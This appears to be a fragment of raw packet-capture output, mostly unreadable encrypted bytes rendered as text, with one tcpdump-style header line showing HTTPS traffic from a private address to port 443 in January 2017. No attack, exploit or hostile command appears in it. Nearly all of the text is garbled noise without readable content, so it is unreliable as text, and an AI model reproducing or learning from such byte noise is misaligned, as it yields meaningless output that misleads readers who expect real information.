E…k.@……..f.:……..k..+r{P…{……..av.zN……p..J..eqJ……..@.X>h..-………”…….~bp…m(5.m….L..`+T.<…a..H7.&……]L…,.ZA..9w.O.(..?..{……9k..^.h..A…T…3.bM.P…O4F2..w….D.2Q..p.m.+h,.6.E.R..A;..V…$..:.qXV?.R”.U.#…b….A.Y`..3..E……..3…\Q.W….R..^.q.KT..O”..S’.V….7.<\f.+(.|..7.}…).”.”Oi.)Q..+…V..mp5…(..W.E|A{].1..
$..?Q.X.#4..d.R..l….E……….6{…h+ …..Z~.9o.+.J.u..6…’..>     …….{R .>k.%…6..S.K.Z……
…..R)z….my…(..B..q.v.._.O.H..Y….cwt1…’Qm…..z….8…..2..Q…1.k…R…P{d.m..ux…o..cy..7…..Xq  .No.3…..S…..        …a…n….DH.9..|..P.C…{.e…..(….N….’….@.19…W…B.’……..b}..X..2…..r:…@…..(].k………s.3…3…,K\.t….NP..q.M_ID…A..m:X…%..M.@..;.H8S……Lc..E….G.i&..g….H……..p!p.A).,…..-.B.\k:…vs.~^….W]+.C.M…..8&    …….\l..,….F.&..n.E.4..Z~.JV..({3o.y..?;.fm…Y…..8.Kx..Q..E.,d.;.Q.-..v..SM.”..:.U.J@t…*..Y..’A&1..i….>..[……xb”33..7..&..$…..2~T…[……..r*.u..?R…]nC*M.;………..%……..p…c….Du..`……k….'[….J…..E.%.n+y)j.1,..QH..b8..8….3.`.jN.a…..EJa…)…cW.UPc..qQ.8…I.k….4.Y.,p.5.Y..E.SC.k0′.R.Li.d.\..3.Ax…x…..^.T…D
.l…i.k.,.’…Y………….fM.        ~.’….N…….8.O……2….a.&q.E.L…pi.
x.S._U…       ….h6.5        …z..Fq,n.&..at………~_eiK%w.5g.D.\…..`.Z……_O…[.<…..”6…/.p…P……..u&#.@…. F..s.`.F+L
…..P..,.DJ..j1…..EB.n…B..U.Ea.AA)……i..|m.4l..r#.^?…/(q…..#….im|..`.|.&..`o_..y…..
2017-01-23 21:18:52.936077 IP 192.168.1.102.50694 > 216.58.218.238.443: Flags [P.], seq 2561:2735, ack 4099, win 252, length 174
E…k.@……..f.:……..q..+r{P…N…….B.-..;$…….B..v…s0     2BT..a…….D…fK..=…F.p.up.=}..*.~L.9…..@….K….RDB.Vmb.2Q…F….y>[…(….<……S…#n6%…………R……….PdI6.C……W71…….